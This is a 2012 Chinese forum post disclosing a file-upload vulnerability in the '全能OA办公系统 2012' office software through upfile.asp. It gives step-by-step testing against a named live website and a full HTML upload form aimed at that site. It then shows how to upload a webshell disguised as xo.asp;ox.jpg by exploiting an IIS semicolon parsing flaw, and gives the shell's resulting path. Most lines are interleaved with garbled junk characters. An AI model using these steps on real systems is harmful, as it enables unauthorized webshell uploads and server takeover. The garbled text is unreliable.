全能OA办公系统 上传漏洞
' u: z% x; L) x+ j+ t
" Q6 E, p3 T {系统介绍:9 o) ^( h2 s4 Y! z; Q# A
# u, S! [% ^% i/ b! o+ B全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。0 J" B( Y5 S$ a$ c+ _
; o, m# u8 ~* U( N `! t主要功能:- }6 \* Q+ K* u; T
公司通告
/ p3 @2 L1 t! b8 C9 o7 o) K! O2 Z8 P工作计划 & p# g6 |% G: Q3 @
通讯助理
4 d- r" a2 |2 x' f4 z8 ]( Z客户资源
7 o v/ g# l* ^% Z我的公文
5 q: M5 N( a3 `: i. n. s. Y8 b2 l \公文传阅 ; j" L; D T: W) f) p) H/ M% n
公共资源 ; p y- \; z# k
资源预约
6 L+ r- @* z; ^6 Y7 z今日考勤 ! J; Q& d" I! |. J9 i2 h
个人计划 : Q) {) f$ v; H8 \" ?2 B3 ]" }
个人通讯录
2 s- Y9 w2 A f( h$ b个人基本档案 # i i; b' h" ]7 q# P$ s/ a
未读邮件 + k5 q% d S, z9 q- w8 O
发邮件 6 P: L: l# s0 n, C( p
收件夹 & X) s7 n1 v0 h( n' P# h4 \+ B
寄件夹 $ R/ f# W1 w' l' Z
网络硬盘 * l; k; y/ Z O9 w( a
网络会议
- o. T0 U2 p/ S7 O! j K1 N网络调查 4 B( j+ U# z0 _* s! W0 J6 X
交流论坛$ J5 J% b! V3 A) k3 r
" G2 Y# d0 N9 \( d
有兴趣测试的朋友可以下源码看看+ P, E' D- U3 M. r/ ~! R
+ w. _- Q6 X& O' B- S$ T源码下载:
4 u5 C+ Z% j5 a6 D1 O G3 ?, Q, \; g
http://www.mycodes.net/30/4750.htm
6 w# }6 a d; f+ U3 ]
7 c! H- }( J9 N1 S漏洞介绍:/ ^) `+ E3 R1 ]( a/ _+ V7 R
; @' ^' C+ d3 |9 t- e, S由upfile.asp上传文件漏洞引起7 g3 A9 @7 \7 H9 C b8 A3 H! R
$ g2 u$ ?# Y) N Y测试方法:5 C$ j! \6 Y& \5 J
4 s7 E3 J+ Q3 o, c, v$ A
使用名小子上传http://www.itlynn.com/upfile.asp即可* H8 u: y* a; d" x
. d; m! M" w8 f% Y/ y6 Y1 I如果upfile.asp文件被删除不存在。
; M2 K' F2 x- f0 U r/ y% D; g( Y* m% G3 E6 H
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
; i) p+ F1 s5 P! |
" y3 C9 Y3 a3 c( ~3 `如果存在那么将如下代码保存为upfile.html。
7 [2 Q. ~5 ?! F
% e9 K3 s' l# ]% l- O, e然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。8 B, r" O4 c9 ^$ G4 M; G# L
( P+ D( |2 q% Y( o5 C& i% E . A& s$ v8 }; V. Y! e
, d! I6 ]/ ^& w+ |% H" q( x2 ~01 <table border='0' align="center" cellpadding="5">
* m- e2 [7 w- I$ [- H& \
+ `! r0 w, L. \8 q, D) `02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
6 H; U- r( A; r2 L! J6 F: {) Q: ?5 {* a7 S' |
03 <tr>
# [; ~# n% T' {: I0 j1 I3 h/ l( E9 K X% [
04 <td>报错:</td> 8 j, U4 p+ K$ z r
. V+ ~1 n P$ ~ U8 ~05 <td><input type='radio' name='errnumber' value='0'> # B$ I8 y3 N# ~/ ~9 ^
2 D C4 f5 v; n3 Y06 自动更名 4 z* z/ X5 Q8 n0 l2 h6 e+ l! T
5 v6 a4 r/ X# M0 c07 <input type='radio' name='errnumber' value='1' checked>
/ z0 K: i. g7 e4 t# a6 j7 r$ u
4 d0 x1 g. T8 s08 报错方式
/ \- `$ ^; S: z9 C" {
9 k5 F' Q$ S) D/ n7 k( s09 <input type='radio' name='errnumber' value='2'> 6 ~. P) r. s. B; d) b! l3 h
0 h/ j9 ?$ B& H1 v10 直接覆盖</td>
' t/ p; V/ `4 m" _; E4 z! a. \: i# j. F
11 </tr>
# X7 o5 \% S$ T* J: w$ c% B* D! a% G- T( U( g9 f2 ?
12 <tr>
& j7 ^/ ^* i ~. d" X; e8 Q/ {" Z! K6 y& v
13 <td>主题:</td>
$ y/ t: k, V& i9 c3 ~& k# v! w' H
14 <td><input type='text' name='filename' size='30'></td> , D* u$ J# a2 s1 B, k T
) t Z3 C' W6 x' Z* }3 e15 </tr> \0 o7 o; F! I5 M9 W3 i3 D/ `
, y7 ~* x- _5 ?16 <tr> 6 o) d8 f6 N1 b5 E! V' M; p
# I. F- ]" O+ d" m! {17 <td>文件:</td> 4 h9 }/ Y( }* B. v
5 I0 k; {7 w/ P' Z4 Q! \1 Z7 L! R
18 <td><input type="file"name="fruit"size="30"></td> 2 n' D- M4 S. o/ b: v7 t( y2 Y
4 \4 e) _' ?/ V2 C
19 </tr>
" z1 c3 Q% N8 ^, x8 C: [6 p' s5 d1 r: w0 J/ W
20 <tr>
1 J$ ^: Q$ ^% Q
1 X0 h& h* I6 C21 <td valign='top'>简介:</td> , H" m1 m) D9 W" e u% }# A! a
% e4 h7 N! |8 E+ c7 g+ E y
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 1 @/ N. @3 b0 e5 W: D, n0 R3 T, ]
7 G. k- o( }. t; M2 h23 </tr> 8 t+ w4 _- ~$ C; P: W3 u* B# [
$ f) w" ]1 {% q) ]# X+ N
24
' h! p: @5 C t, K7 A9 }
$ i9 G: F" f% n. ] S+ K% H% @+ F25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
0 t( a. m4 J, X$ j* V. ^2 q: Y7 s% A; i4 }
26 </tr> , M* |6 I" I8 G. D( @- S
3 n: v9 W: q# {) r1 R( u8 w0 ? o8 X27 </form>
4 i; l O& O: _( C$ \) }/ e; e
4 e$ g2 K: _$ e然后打开上传一个文件名为xo.asp;ox.jpg的文件。
- ?. c: k$ L2 z+ f; j$ p2 k2 y/ h# g$ T; l4 ?, p4 M( G
$ d, G, Z4 X- W4 L( }4 g, p9 Y& X. h [
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
* }: G- Q/ T# k) m1 ^+ G7 x. ^* a7 p# }' ^
此漏洞需要配合解析漏洞利用。9 x8 p. Q% y% O* U @* y* r6 h9 g
4 \' @/ b0 n. m" _: \/ ]! V H |
发表于 2012-11-21 13:45:12
收藏
分享
支持
反对